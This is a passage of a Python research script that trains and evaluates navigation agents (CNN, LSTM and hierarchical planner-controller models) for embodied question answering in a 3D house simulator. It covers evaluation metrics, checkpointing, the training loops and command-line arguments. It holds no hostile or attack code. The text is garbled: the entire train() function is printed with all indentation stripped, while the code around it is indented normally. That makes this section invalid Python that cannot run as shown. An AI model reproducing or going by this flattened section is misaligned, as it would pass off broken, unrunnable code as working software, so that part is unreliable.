                            if '+q' in args.model_type:
                                scores = model(sub_img_feats_var,
                                               questions_var)
                            else:
                                scores = model(sub_img_feats_var)
                            prob = F.softmax(scores, dim=1)
                            action = int(prob.max(1)[1].data.cpu().numpy()[0])
                            actions.append(action)
                            img, _, episode_done = h3d.step(action)
                            episode_done = episode_done or episode_length >= args.max_episode_length
                            img = torch.from_numpy(img.transpose(
                                2, 0, 1)).float() / 255.0
                            img_feat_var = eval_loader.dataset.cnn(
                                Variable(img.view(1, 3, 224, 224)
                                         .to(device))).view(1, 1, 3200)
                            sub_img_feats_var = torch.cat(
                                [sub_img_feats_var, img_feat_var], dim=1)
                            sub_img_feats_var = sub_img_feats_var[:, -5:, :]
                            dists_to_target.append(
                                h3d.get_dist_to_target(h3d.env.cam.pos))
                            pos_queue.append([
                                h3d.env.cam.pos.x, h3d.env.cam.pos.y,
                                h3d.env.cam.pos.z, h3d.env.cam.yaw
                            ])
                            if episode_done == True:
                                break
                        # compute stats
                        metrics_slug['d_0_' + str(i)] = dists_to_target[0]
                        metrics_slug['d_T_' + str(i)] = dists_to_target[-1]
                        metrics_slug['d_D_' + str(
                            i)] = dists_to_target[0] - dists_to_target[-1]
                        metrics_slug['d_min_' + str(i)] = np.array(
                            dists_to_target).min()
                        metrics_slug['ep_len_' + str(i)] = episode_length
                        if action == 3:
                            metrics_slug['stop_' + str(i)] = 1
                        else:
                            metrics_slug['stop_' + str(i)] = 0
                        inside_room = []
                        for p in pos_queue:
                            inside_room.append(
                                h3d.is_inside_room(
                                    p, eval_loader.dataset.target_room))
                        if inside_room[-1] == True:
                            metrics_slug['r_T_' + str(i)] = 1
                        else:
                            metrics_slug['r_T_' + str(i)] = 0
                        if any([x == True for x in inside_room]) == True:
                            metrics_slug['r_e_' + str(i)] = 1
                        else:
                            metrics_slug['r_e_' + str(i)] = 0
                    # collate and update metrics
                    metrics_list = []
                    for i in metrics.metric_names:
                        if i not in metrics_slug:
                            metrics_list.append(metrics.metrics[
                                metrics.metric_names.index(i)][0])
                        else:
                            metrics_list.append(metrics_slug[i])
                    # update metrics
                    metrics.update(metrics_list)
                print(metrics.get_stat_string(mode=0))
                print('invalids', len(invalids))
                logging.info("EVAL: metrics: {}".format(metrics.get_stat_string(mode=0)))
                logging.info("EVAL: invalids: {}".format(len(invalids)))
                # del h3d
                eval_loader.dataset._load_envs()
                if len(eval_loader.dataset.pruned_env_set) == 0:
                    done = True
        elif 'lstm' in args.model_type:
            done = False
            while done == False:
                if args.overfit:
                    metrics = NavMetric(
                        info={'split': args.eval_split,
                              'thread': rank},
                        metric_names=[
                            'd_0_10', 'd_0_30', 'd_0_50', 'd_T_10', 'd_T_30', 'd_T_50',
                            'd_D_10', 'd_D_30', 'd_D_50', 'd_min_10', 'd_min_30',
                            'd_min_50', 'r_T_10', 'r_T_30', 'r_T_50', 'r_e_10', 'r_e_30',
                            'r_e_50', 'stop_10', 'stop_30', 'stop_50', 'ep_len_10',
                            'ep_len_30', 'ep_len_50'
                        ],
                        log_json=args.output_log_path)
                for batch in tqdm(eval_loader):
                    model.load_state_dict(shared_model.state_dict())
                    model.to(device)
                    idx, questions, answer, _, actions_in, actions_out, action_lengths, _ = batch
                    question_var = Variable(questions.to(device))
                    metrics_slug = {}
                    # evaluate at multiple initializations
                    for i in [10, 30, 50]:
                        t += 1
                        if action_lengths[0] - 1 - i < 0:
                            invalids.append([idx[0], i])
                            continue
                        h3d = eval_loader.dataset.episode_house
                        # forward through lstm till spawn
                        if len(eval_loader.dataset.episode_pos_queue[:-i]
                               ) > 0:
                            images = eval_loader.dataset.get_frames(
                                h3d,
                                eval_loader.dataset.episode_pos_queue[:-i],
                                preprocess=True)
                            raw_img_feats = eval_loader.dataset.cnn(
                                Variable(torch.FloatTensor(images).to(device)))
                            actions_in_pruned = actions_in[:, :
                                                           action_lengths[0] -
                                                           i]
                            actions_in_var = Variable(actions_in_pruned.to(device))
                            action_lengths_pruned = action_lengths.clone(
                            ).fill_(action_lengths[0] - i)
                            img_feats_var = raw_img_feats.view(1, -1, 3200)
                            if '+q' in args.model_type:
                                scores, hidden = model(
                                    img_feats_var, question_var,
                                    actions_in_var,
                                    action_lengths_pruned.cpu().numpy())
                            else:
                                scores, hidden = model(
                                    img_feats_var, False, actions_in_var,
                                    action_lengths_pruned.cpu().numpy())
                            # fix: narrowed the bare except -- only a too-short
                            # position queue (IndexError) is an expected failure
                            try:
                                init_pos = eval_loader.dataset.episode_pos_queue[
                                    -i]
                            except IndexError:
                                invalids.append([idx[0], i])
                                continue
                            action_in = torch.LongTensor(1, 1).fill_(
                                actions_in[0,
                                           action_lengths[0] - i]).to(device)
                        else:
                            init_pos = eval_loader.dataset.episode_pos_queue[
                                -i]
                            hidden = model.nav_rnn.init_hidden(1)
                            action_in = torch.LongTensor(1, 1).fill_(0).to(device)
                        h3d.env.reset(
                            x=init_pos[0], y=init_pos[2], yaw=init_pos[3])
                        init_dist_to_target = h3d.get_dist_to_target(
                            h3d.env.cam.pos)
                        if init_dist_to_target < 0:  # unreachable
                            invalids.append([idx[0], i])
                            continue
                        img = h3d.env.render()
                        img = torch.from_numpy(img.transpose(
                            2, 0, 1)).float() / 255.0
                        img_feat_var = eval_loader.dataset.cnn(
                            Variable(img.view(1, 3, 224, 224).to(device))).view(
                                1, 1, 3200)
                        episode_length = 0
                        episode_done = True
                        dists_to_target, pos_queue, actions = [
                            init_dist_to_target
                        ], [init_pos], []
                        actual_pos_queue = [(h3d.env.cam.pos.x, h3d.env.cam.pos.z, h3d.env.cam.yaw)]
                        for step in range(args.max_episode_length):
                            episode_length += 1
                            if '+q' in args.model_type:
                                scores, hidden = model(
                                    img_feat_var,
                                    question_var,
                                    Variable(action_in),
                                    False,
                                    hidden=hidden,
                                    step=True)
                            else:
                                scores, hidden = model(
                                    img_feat_var,
                                    False,
                                    Variable(action_in),
                                    False,
                                    hidden=hidden,
                                    step=True)
                            prob = F.softmax(scores, dim=1)
                            action = int(prob.max(1)[1].data.cpu().numpy()[0])
                            actions.append(action)
                            img, _, episode_done = h3d.step(action)
                            episode_done = episode_done or episode_length >= args.max_episode_length
                            img = torch.from_numpy(img.transpose(
                                2, 0, 1)).float() / 255.0
                            img_feat_var = eval_loader.dataset.cnn(
                                Variable(img.view(1, 3, 224, 224)
                                         .to(device))).view(1, 1, 3200)
                            action_in = torch.LongTensor(
                                1, 1).fill_(action + 1).to(device)
                            dists_to_target.append(
                                h3d.get_dist_to_target(h3d.env.cam.pos))
                            pos_queue.append([
                                h3d.env.cam.pos.x, h3d.env.cam.pos.y,
                                h3d.env.cam.pos.z, h3d.env.cam.yaw
                            ])
                            if episode_done == True:
                                break
                            actual_pos_queue.append([
                                h3d.env.cam.pos.x, h3d.env.cam.pos.z, h3d.env.cam.yaw])
                        # compute stats
                        metrics_slug['d_0_' + str(i)] = dists_to_target[0]
                        metrics_slug['d_T_' + str(i)] = dists_to_target[-1]
                        metrics_slug['d_D_' + str(
                            i)] = dists_to_target[0] - dists_to_target[-1]
                        metrics_slug['d_min_' + str(i)] = np.array(
                            dists_to_target).min()
                        metrics_slug['ep_len_' + str(i)] = episode_length
                        if action == 3:
                            metrics_slug['stop_' + str(i)] = 1
                        else:
                            metrics_slug['stop_' + str(i)] = 0
                        inside_room = []
                        for p in pos_queue:
                            inside_room.append(
                                h3d.is_inside_room(
                                    p, eval_loader.dataset.target_room))
                        if inside_room[-1] == True:
                            metrics_slug['r_T_' + str(i)] = 1
                        else:
                            metrics_slug['r_T_' + str(i)] = 0
                        if any([x == True for x in inside_room]) == True:
                            metrics_slug['r_e_' + str(i)] = 1
                        else:
                            metrics_slug['r_e_' + str(i)] = 0
                    # collate and update metrics
                    metrics_list = []
                    for i in metrics.metric_names:
                        if i not in metrics_slug:
                            metrics_list.append(metrics.metrics[
                                metrics.metric_names.index(i)][0])
                        else:
                            metrics_list.append(metrics_slug[i])
                    # update metrics
                    metrics.update(metrics_list)
                print(metrics.get_stat_string(mode=0))
                print('invalids', len(invalids))
                logging.info("EVAL: init_steps: {} metrics: {}".format(i, metrics.get_stat_string(mode=0)))
                logging.info("EVAL: init_steps: {} invalids: {}".format(i, len(invalids)))
                # del h3d
                eval_loader.dataset._load_envs()
                print("eval_loader pruned_env_set len: {}".format(len(eval_loader.dataset.pruned_env_set)))
                logging.info("eval_loader pruned_env_set len: {}".format(len(eval_loader.dataset.pruned_env_set)))
                # fix: removed a leftover debug `assert len(...) > 0` that
                # made the loop-exit condition below unreachable (the assert
                # crashed instead of letting the loop terminate cleanly)
                if len(eval_loader.dataset.pruned_env_set) == 0:
                    done = True
        elif 'pacman' in args.model_type:
            done = False
            while done == False:
                if args.overfit:
                    metrics = NavMetric(
                        info={'split': args.eval_split,
                              'thread': rank},
                        metric_names=[
                            'd_0_10', 'd_0_30', 'd_0_50', 'd_T_10', 'd_T_30', 'd_T_50',
                            'd_D_10', 'd_D_30', 'd_D_50', 'd_min_10', 'd_min_30',
                            'd_min_50', 'r_T_10', 'r_T_30', 'r_T_50', 'r_e_10', 'r_e_30',
                            'r_e_50', 'stop_10', 'stop_30', 'stop_50', 'ep_len_10',
                            'ep_len_30', 'ep_len_50'
                        ],
                        log_json=args.output_log_path)
                #time_img = time.strftime("%m_%d_%H:%M")
                for num, batch in enumerate(tqdm(eval_loader)):
                    model.load_state_dict(shared_model.state_dict())
                    model.to(device)
                    idx, question, answer, actions, action_length = batch
                    metrics_slug = {}
                    #print('Question is ', question)
                    #print('answer is ', answer)
                    answeris = answer.item()
                    h3d = eval_loader.dataset.episode_house
                    # print("Target Room Is: ")
                    # print(eval_loader.dataset.target_room)
                    # print("Target Object Is: ")
                    # print(eval_loader.dataset.target_obj)
                    # evaluate at multiple initializations
                    video_dir = '../video/nav'
                    video_dir = os.path.join(video_dir,
                                             args.time_id + '_' + args.identifier)
                    for i in [10, 30, 50]:
                        #Satyen suggests Himi changes ----> works
                        fourcc = cv2.VideoWriter_fourcc(*'XVID')
                        time_now = time.strftime("%m_%d_%H:%M")
                        if args.render:
                            video_name = '%s_video_%d_%d.avi' %(time_now, i, answeris)
                            video = cv2.VideoWriter(video_name, fourcc, 5, (224, 224))
                        t += 1
                        if i > action_length[0]:
                            invalids.append([idx[0], i])
                            continue
                        question_var = Variable(question.to(device))
                        controller_step = False
                        planner_hidden = model.planner_nav_rnn.init_hidden(1)
                        # get hierarchical action history
                        (
                            planner_actions_in, planner_img_feats,
                            controller_step, controller_action_in,
                            controller_img_feats, init_pos,
                            controller_action_counter
                        ) = eval_loader.dataset.get_hierarchical_features_till_spawn(
                            actions[0, :action_length[0] + 1].numpy(), i, args.max_controller_actions
                        )
                        planner_actions_in_var = Variable(
                            planner_actions_in.to(device))
                        planner_img_feats_var = Variable(
                            planner_img_feats.to(device))
                        # forward planner till spawn to update hidden state
                        for step in range(planner_actions_in.size(0)):
                            planner_scores, planner_hidden = model.planner_step(
                                question_var, planner_img_feats_var[step]
                                .unsqueeze(0).unsqueeze(0),
                                planner_actions_in_var[step].view(1, 1),
                                planner_hidden
                            )
                        h3d.env.reset(
                            x=init_pos[0], y=init_pos[2], yaw=init_pos[3])
                        init_dist_to_target = h3d.get_dist_to_target(
                            h3d.env.cam.pos)
                        if init_dist_to_target < 0:  # unreachable
                            invalids.append([idx[0], i])
                            continue
                        dists_to_target, pos_queue, pred_actions = [
                            init_dist_to_target
                        ], [init_pos], []
                        planner_actions, controller_actions = [], []
                        episode_length = 0
                        if args.max_controller_actions > 1:
                            controller_action_counter = controller_action_counter % args.max_controller_actions
                            controller_action_counter = max(controller_action_counter - 1, 0)
                        else:
                            controller_action_counter = 0
                        first_step = True
                        first_step_is_controller = controller_step
                        planner_step = True
                        action = int(controller_action_in)
                        cov_batch_i = []
                        for step in range(args.max_episode_length):
                            if not first_step:
                                img = torch.from_numpy(img.transpose(
                                    2, 0, 1)).float() / 255.0
                                img_feat_var = eval_loader.dataset.cnn(
                                    Variable(img.view(1, 3, 224,
                                                      224).to(device))).view(
                                                          1, 1, 3200)
                            else:
                                img_feat_var = Variable(controller_img_feats.to(device)).view(1, 1, 3200)
                            if not first_step or first_step_is_controller:
                                # query controller to continue or not
                                controller_action_in = Variable(
                                    torch.LongTensor(1, 1).fill_(action).to(device))
                                controller_scores = model.controller_step(
                                    img_feat_var, controller_action_in,
                                    planner_hidden[0])
                                prob = F.softmax(controller_scores, dim=1)
                                controller_action = int(
                                    prob.max(1)[1].data.cpu().numpy()[0])
                                if controller_action == 1 and controller_action_counter < args.max_controller_actions - 1:
                                    controller_action_counter += 1
                                    planner_step = False
                                else:
                                    controller_action_counter = 0
                                    planner_step = True
                                    controller_action = 0
                                controller_actions.append(controller_action)
                                first_step = False
                            if planner_step:
                                if not first_step:
                                    action_in = torch.LongTensor(
                                        1, 1).fill_(action + 1).to(device)
                                    planner_scores, planner_hidden = model.planner_step(
                                        question_var, img_feat_var,
                                        Variable(action_in), planner_hidden)
                                prob = F.softmax(planner_scores, dim=1)
                                action = int(
                                    prob.max(1)[1].data.cpu().numpy()[0])
                                planner_actions.append(action)
                            episode_done = action == 3 or episode_length >= args.max_episode_length
                            episode_length += 1
                            dists_to_target.append(
                                h3d.get_dist_to_target(h3d.env.cam.pos))
                            pos_queue.append([
                                h3d.env.cam.pos.x, h3d.env.cam.pos.y,
                                h3d.env.cam.pos.z, h3d.env.cam.yaw
                            ])
                            # per-frame target-object coverage from the semantic render
                            target_obj = eval_loader.dataset.target_obj['fine_class']
                            img_semantic = h3d.env.render(mode='semantic')
                            cov = coverage(img_semantic, target_obj, semantic_classes)
                            cov_batch_i.append(cov)
                            if episode_done:
                                # tag the episode's coverage list with its class label
                                cov_batch_i.append(target_obj)
                                if num not in coverage_log[t].keys():
                                    coverage_log[t][num] = {}
                                coverage_log[t][num].update({i:cov_batch_i})
                                break
                            img, _, _ = h3d.step(action)
                            #cv2.imwrite('{}-{}-{}-{}.png'.format(num, i, episode_length, time_img), img)
                            if args.render:
                                # cv2.imshow('window', img)
                                # cv2.waitKey(100)
                                video.write(img)
                            first_step = False
                        if args.render:
                            video.release()
                        # compute stats
                        metrics_slug['d_0_' + str(i)] = dists_to_target[0]
                        metrics_slug['d_T_' + str(i)] = dists_to_target[-1]
                        metrics_slug['d_D_' + str(
                            i)] = dists_to_target[0] - dists_to_target[-1]
                        metrics_slug['d_min_' + str(i)] = np.array(
                            dists_to_target).min()
                        metrics_slug['ep_len_' + str(i)] = episode_length
                        if action == 3:
                            metrics_slug['stop_' + str(i)] = 1
                        else:
                            metrics_slug['stop_' + str(i)] = 0
                        inside_room = []
                        for p in pos_queue:
                            inside_room.append(
                                h3d.is_inside_room(
                                    p, eval_loader.dataset.target_room))
                        if inside_room[-1] == True:
                            metrics_slug['r_T_' + str(i)] = 1
                        else:
                            metrics_slug['r_T_' + str(i)] = 0
                        if any([x == True for x in inside_room]) == True:
                            metrics_slug['r_e_' + str(i)] = 1
                        else:
                            metrics_slug['r_e_' + str(i)] = 0
                    # collate and update metrics
                    metrics_list = []
                    for i in metrics.metric_names:
                        if i not in metrics_slug:
                            metrics_list.append(metrics.metrics[
                                metrics.metric_names.index(i)][0])
                        else:
                            metrics_list.append(metrics_slug[i])
                    # update metrics
                    metrics.update(metrics_list)
                    try:
                        print(metrics.get_stat_string(mode=0))
                        logging.info("EVAL: metrics: {}".format(metrics.get_stat_string(mode=0)))
                    except Exception:
                        # best-effort logging only; narrowed from a bare except
                        pass
                print('epoch', epoch)
                print('invalids', len(invalids))
                logging.info("EVAL: epoch {}".format(epoch))
                logging.info("EVAL: invalids {}".format(invalids))
                # del h3d
                eval_loader.dataset._load_envs()
                if len(eval_loader.dataset.pruned_env_set) == 0:
                    done = True
        epoch += 1
        cov_avg = avgCov(coverage_log)
        # checkpoint if best val loss
        if metrics.metrics[8][0] > best_eval_acc:  # d_D_50
            best_eval_acc = metrics.metrics[8][0]
            if epoch % args.eval_every == 0 and args.to_log == 1:
                metrics.dump_log()
                model_state = get_state(model)
                aad = dict(args.__dict__)
                ad = {}
                for i in aad:
                    if i[0] != '_':
                        ad[i] = aad[i]
                checkpoint = {'args': ad, 'state': model_state, 'epoch': epoch}
                checkpoint_path = '%s/epoch_%d_d_D_50_%.04f.pt' % (
                    args.checkpoint_dir, epoch, best_eval_acc)
                print('Saving checkpoint to %s' % checkpoint_path)
                logging.info("EVAL: Saving checkpoint to {}".format(checkpoint_path))
                torch.save(checkpoint, checkpoint_path)
        # fix: the original printed `best_cov`, a name never defined anywhere
        # in this function, which raised NameError here; the intended value is
        # cov_avg computed from coverage_log above
        print('[best_eval_d_D_50:%.04f; best Coverage:%.04f]' % (best_eval_acc, cov_avg))
        logging.info("EVAL: [best_eval_d_D_50:{0:.2f}]".format(best_eval_acc))
        eval_loader.dataset._load_envs(start_idx=0, in_order=True)
    return best_eval_acc
def train(rank, args, shared_model, resume_epoch = 0):
torch.cuda.set_device(args.gpus.index(args.gpus[rank % len(args.gpus)]))
if args.model_type == 'cnn':
model_kwargs = {}
model = NavCnnModel(**model_kwargs)
elif args.model_type == 'cnn+q':
model_kwargs = {
'question_input': True,
'question_vocab': load_vocab(args.vocab_json)
}
model = NavCnnModel(**model_kwargs)
elif args.model_type == 'lstm':
model_kwargs = {}
model = NavCnnRnnModel(**model_kwargs)
elif args.model_type == 'lstm-mult+q':
model_kwargs = {
'question_input': True,
'question_vocab': load_vocab(args.vocab_json)
}
model = NavCnnRnnMultModel(**model_kwargs)
elif args.model_type == 'lstm+q':
model_kwargs = {
'question_input': True,
'question_vocab': load_vocab(args.vocab_json)
}
model = NavCnnRnnModel(**model_kwargs)
elif args.model_type == 'pacman':
model_kwargs = {'question_vocab': load_vocab(args.vocab_json)}
model = NavPlannerControllerModel(**model_kwargs)
else:
exit()
lossFn = torch.nn.CrossEntropyLoss().cuda()
optim = torch.optim.Adamax(
filter(lambda p: p.requires_grad, shared_model.parameters()),
lr=args.learning_rate)
train_loader_kwargs = {
'questions_h5': args.train_h5,
'data_json': args.data_json,
'vocab': args.vocab_json,
'batch_size': args.batch_size,
'input_type': args.model_type,
'num_frames': 5,
'map_resolution': args.map_resolution,
'split': 'train',
'max_threads_per_gpu': args.max_threads_per_gpu,
'gpu_id': args.gpus[rank % len(args.gpus)],
'to_cache': args.to_cache,
'overfit': args.overfit,
'max_controller_actions': args.max_controller_actions,
'max_actions': args.max_actions
}
args.output_log_path = os.path.join(args.log_dir,
'train_' + str(rank) + '.json')
if 'pacman' in args.model_type:
metrics = NavMetric(
info={'split': 'train',
'thread': rank},
metric_names=['planner_loss', 'controller_loss'],
log_json=args.output_log_path)
else:
metrics = NavMetric(
info={'split': 'train',
'thread': rank},
metric_names=['loss'],
log_json=args.output_log_path)
train_loader = EqaDataLoader(**train_loader_kwargs)
print('train_loader has %d samples' % len(train_loader.dataset))
logging.info('TRAIN: train loader has {} samples'.format(len(train_loader.dataset)))
t, epoch = 0, resume_epoch
best_eval_acc = 0 if args.best_eval_acc==0 else args.best_eval_acc
while epoch < int(args.max_epochs):
if 'cnn' in args.model_type:
done = False
all_envs_loaded = train_loader.dataset._check_if_all_envs_loaded()
while done == False:
for batch in train_loader:
t += 1
model.load_state_dict(shared_model.state_dict())
model.train()
model.cuda()
idx, questions, _, img_feats, _, actions_out, _ = batch
img_feats_var = Variable(img_feats.cuda())
if '+q' in args.model_type:
questions_var = Variable(questions.cuda())
actions_out_var = Variable(actions_out.cuda())
if '+q' in args.model_type:
scores = model(img_feats_var, questions_var)
else:
scores = model(img_feats_var)
loss = lossFn(scores, actions_out_var)
# zero grad
optim.zero_grad()
# update metrics
metrics.update([loss.data[0]])
# backprop and update
loss.backward()
ensure_shared_grads(model.cpu(), shared_model)
optim.step()
if t % args.print_every == 0:
print(metrics.get_stat_string())
logging.info("TRAIN: metrics: {}".format(metrics.get_stat_string()))
if args.to_log == 1:
metrics.dump_log()
print('[CHECK][Cache:%d][Total:%d]' %
(len(train_loader.dataset.img_data_cache),
len(train_loader.dataset.env_list)))
logging.info('TRAIN: [CHECK][Cache:{}][Total:{}]'.format(
len(train_loader.dataset.img_data_cache), len(train_loader.dataset.env_list)))
if all_envs_loaded == False:
train_loader.dataset._load_envs(in_order=True)
if len(train_loader.dataset.pruned_env_set) == 0:
done = True
if args.to_cache == False:
train_loader.dataset._load_envs(
start_idx=0, in_order=True)
else:
done = True
elif 'lstm' in args.model_type:
lossFn = MaskedNLLCriterion().cuda()
done = False
all_envs_loaded = train_loader.dataset._check_if_all_envs_loaded()
total_times = []
while done == False:
start_time = time.time()
for batch in train_loader:
t += 1
model.load_state_dict(shared_model.state_dict())
model.train()
model.cuda()
idx, questions, _, img_feats, actions_in, actions_out, action_lengths, masks = batch
img_feats_var = Variable(img_feats.cuda())
if '+q' in args.model_type:
questions_var = Variable(questions.cuda())
actions_in_var = Variable(actions_in.cuda())
actions_out_var = Variable(actions_out.cuda())
action_lengths = action_lengths.cuda()
masks_var = Variable(masks.cuda())
action_lengths, perm_idx = action_lengths.sort(
0, descending=True)
img_feats_var = img_feats_var[perm_idx]
if '+q' in args.model_type:
questions_var = questions_var[perm_idx]
actions_in_var = actions_in_var[perm_idx]
actions_out_var = actions_out_var[perm_idx]
masks_var = masks_var[perm_idx]
if '+q' in args.model_type:
scores, hidden = model(img_feats_var, questions_var,
actions_in_var,
action_lengths.cpu().numpy())
else:
scores, hidden = model(img_feats_var, False,
actions_in_var,
action_lengths.cpu().numpy())
#block out masks
if args.curriculum:
curriculum_length = (epoch+1)*5
for i, action_length in enumerate(action_lengths):
if action_length - curriculum_length > 0:
masks_var[i, :action_length-curriculum_length] = 0
logprob = F.log_softmax(scores, dim=1)
loss = lossFn(
logprob, actions_out_var[:, :action_lengths.max()]
.contiguous().view(-1, 1),
masks_var[:, :action_lengths.max()].contiguous().view(
-1, 1))
# zero grad
optim.zero_grad()
# update metrics
metrics.update([loss.data[0]])
logging.info("TRAIN LSTM loss: {:.6f}".format(loss.data[0]))
# backprop and update
loss.backward()
ensure_shared_grads(model.cpu(), shared_model)
optim.step()
if t % args.print_every == 0:
print(metrics.get_stat_string())
logging.info("TRAIN: metrics: {}".format(metrics.get_stat_string()))
if args.to_log == 1:
metrics.dump_log()
print('[CHECK][Cache:%d][Total:%d]' %
(len(train_loader.dataset.img_data_cache),
len(train_loader.dataset.env_list)))
logging.info('TRAIN: [CHECK][Cache:{}][Total:{}]'.format(
len(train_loader.dataset.img_data_cache), len(train_loader.dataset.env_list)))
if all_envs_loaded == False:
train_loader.dataset._load_envs(in_order=True)
if len(train_loader.dataset.pruned_env_set) == 0:
done = True
if args.to_cache == False:
train_loader.dataset._load_envs(
start_idx=0, in_order=True)
else:
done = True
elif 'pacman' in args.model_type:
planner_lossFn = MaskedNLLCriterion().cuda()
controller_lossFn = MaskedNLLCriterion().cuda()
done = False
all_envs_loaded = train_loader.dataset._check_if_all_envs_loaded()
while done == False:
for batch in train_loader:
t += 1
model.load_state_dict(shared_model.state_dict())
model.train()
model.cuda()
idx, questions, _, planner_img_feats, planner_actions_in, \
planner_actions_out, planner_action_lengths, planner_masks, \
controller_img_feats, controller_actions_in, planner_hidden_idx, \
controller_outs, controller_action_lengths, controller_masks = batch
questions_var = Variable(questions.cuda())
planner_img_feats_var = Variable(planner_img_feats.cuda())
planner_actions_in_var = Variable(
planner_actions_in.cuda())
planner_actions_out_var = Variable(
planner_actions_out.cuda())
planner_action_lengths = planner_action_lengths.cuda()
planner_masks_var = Variable(planner_masks.cuda())
controller_img_feats_var = Variable(
controller_img_feats.cuda())
controller_actions_in_var = Variable(
controller_actions_in.cuda())
planner_hidden_idx_var = Variable(
planner_hidden_idx.cuda())
controller_outs_var = Variable(controller_outs.cuda())
controller_action_lengths = controller_action_lengths.cuda(
)
controller_masks_var = Variable(controller_masks.cuda())
planner_action_lengths, perm_idx = planner_action_lengths.sort(
0, descending=True)
questions_var = questions_var[perm_idx]
planner_img_feats_var = planner_img_feats_var[perm_idx]
planner_actions_in_var = planner_actions_in_var[perm_idx]
planner_actions_out_var = planner_actions_out_var[perm_idx]
planner_masks_var = planner_masks_var[perm_idx]
controller_img_feats_var = controller_img_feats_var[
perm_idx]
controller_actions_in_var = controller_actions_in_var[
perm_idx]
controller_outs_var = controller_outs_var[perm_idx]
planner_hidden_idx_var = planner_hidden_idx_var[perm_idx]
controller_action_lengths = controller_action_lengths[
perm_idx]
controller_masks_var = controller_masks_var[perm_idx]
planner_scores, controller_scores, planner_hidden = model(
questions_var, planner_img_feats_var,
planner_actions_in_var,
planner_action_lengths.cpu().numpy(),
planner_hidden_idx_var, controller_img_feats_var,
controller_actions_in_var, controller_action_lengths)
planner_logprob = F.log_softmax(planner_scores, dim=1)
controller_logprob = F.log_softmax(
controller_scores, dim=1)
planner_loss = planner_lossFn(
planner_logprob,
planner_actions_out_var[:, :planner_action_lengths.max(
)].contiguous().view(-1, 1),
planner_masks_var[:, :planner_action_lengths.max()]
.contiguous().view(-1, 1))
controller_loss = controller_lossFn(
controller_logprob,
controller_outs_var[:, :controller_action_lengths.max(
)].contiguous().view(-1, 1),
controller_masks_var[:, :controller_action_lengths.max(
)].contiguous().view(-1, 1))
# zero grad
optim.zero_grad()
# update metrics
metrics.update(
[planner_loss.data[0], controller_loss.data[0]])
logging.info("TRAINING PACMAN planner-loss: {:.6f} controller-loss: {:.6f}".format(
planner_loss.data[0], controller_loss.data[0]))
# backprop and update
if args.max_controller_actions == 1:
(planner_loss).backward()
else:
(planner_loss + controller_loss).backward()
ensure_shared_grads(model.cpu(), shared_model)
optim.step()
if t % args.print_every == 0:
print(metrics.get_stat_string())
logging.info("TRAIN: metrics: {}".format(metrics.get_stat_string()))
if args.to_log == 1:
metrics.dump_log()
print('[CHECK][Cache:%d][Total:%d]' %
(len(train_loader.dataset.img_data_cache),
len(train_loader.dataset.env_list)))
logging.info('TRAIN: [CHECK][Cache:{}][Total:{}]'.format(
len(train_loader.dataset.img_data_cache), len(train_loader.dataset.env_list)))
if all_envs_loaded == False:
train_loader.dataset._load_envs(in_order=True)
if len(train_loader.dataset.pruned_env_set) == 0:
done = True
if args.to_cache == False:
train_loader.dataset._load_envs(
start_idx=0, in_order=True)
else:
done = True
epoch += 1
if epoch % args.eval_every ==0:
best_eval_acc = eval(rank,args,shared_model, best_eval_acc)
if epoch % args.save_every == 0:
model_state = get_state(model)
optimizer_state = optim.state_dict()
aad = dict(args.__dict__)
ad = {}
for i in aad:
if i[0] != '_':
ad[i] = aad[i]
checkpoint = {'args': ad,
'state': model_state,
'epoch': epoch,
'optimizer': optimizer_state}
checkpoint_path = '%s/epoch_%d_thread_%d.pt' % (
args.checkpoint_dir, epoch, rank)
print('Saving checkpoint to %s' % checkpoint_path)
logging.info("TRAIN: Saving checkpoint to {}".format(checkpoint_path))
torch.save(checkpoint, checkpoint_path)
if __name__ == '__main__':
    # Entry point: parse CLI args, build the shared navigation model,
    # optionally restore a checkpoint, then dispatch to train / eval /
    # train+eval (multi-process) according to -mode.
    parser = argparse.ArgumentParser()

    # data params
    parser.add_argument('-train_h5', default='utils/data/pruned_train_v2.h5')
    parser.add_argument('-val_h5', default='utils/data/pruned_val_v2.h5')
    parser.add_argument('-test_h5', default='utils/data/pruned_test_v2.h5')
    parser.add_argument('-data_json', default='utils/data/pruned_data_json_v2.json')
    parser.add_argument('-vocab_json', default='data/new_vocab.json')
    parser.add_argument(
        '-target_obj_conn_map_dir',
        default='data/500')
    parser.add_argument('-map_resolution', default=500, type=int)
    parser.add_argument(
        '-mode',
        default='train+eval',
        type=str,
        choices=['train', 'eval', 'train+eval'])
    parser.add_argument('-eval_split', default='val', type=str)

    # model details
    parser.add_argument(
        '-model_type',
        default='pacman',
        choices=['cnn', 'cnn+q', 'lstm', 'lstm+q', 'lstm-mult+q', 'pacman'])
    parser.add_argument('-max_episode_length', default=100, type=int)
    parser.add_argument('-curriculum', default=0, type=int)

    # optim params
    parser.add_argument('-batch_size', default=20, type=int)
    parser.add_argument('-learning_rate', default=1e-3, type=float)
    parser.add_argument('-max_epochs', default=1000, type=int)
    parser.add_argument('-overfit', default=False, action='store_true')
    parser.add_argument('-render', default=False, action='store_true')

    # bookkeeping
    parser.add_argument('-print_every', default=5, type=int)
    parser.add_argument('-eval_every', default=1, type=int)
    # optional if you would like to save specific epochs as opposed to
    # relying on the eval thread
    parser.add_argument('-save_every', default=5, type=int)
    parser.add_argument('-identifier', default='pacman')
    parser.add_argument('-num_processes', default=1, type=int)
    parser.add_argument('-max_threads_per_gpu', default=10, type=int)

    # checkpointing
    parser.add_argument('-checkpoint_path', default=False)
    parser.add_argument('-checkpoint_dir', default='checkpoints/05_06/nav/')
    parser.add_argument('-log_dir', default='logs/05_06/nav/')
    parser.add_argument('-to_log', default=1, type=int)
    parser.add_argument('-to_cache', action='store_true')
    parser.add_argument('-max_controller_actions', type=int, default=5)
    parser.add_argument('-max_actions', type=int)
    parser.add_argument('-best_eval_acc', type=float, default=0)
    args = parser.parse_args()
    args.time_id = time.strftime("%m_%d_%H:%M")

    #MAX_CONTROLLER_ACTIONS = args.max_controller_actions

    # The *base* log dir must exist before logging.basicConfig below;
    # the per-run subdirectory is created further down.
    if not os.path.isdir(args.log_dir):
        os.makedirs(args.log_dir)

    if args.curriculum:
        # TODO: Finish implementing curriculum for other model types
        assert 'lstm' in args.model_type

    logging.basicConfig(filename=os.path.join(args.log_dir, "run_{}.log".format(
                                                str(datetime.now()).replace(' ', '_'))),
                        level=logging.INFO,
                        format='%(asctime)-15s %(message)s')

    #try:
    #    args.gpus = os.environ['CUDA_VISIBLE_DEVICES'].split(',')
    #    args.gpus = [int(x) for x in args.gpus]
    #except KeyError:
    #    print("CPU not supported")
    #    logging.info("CPU not supported")
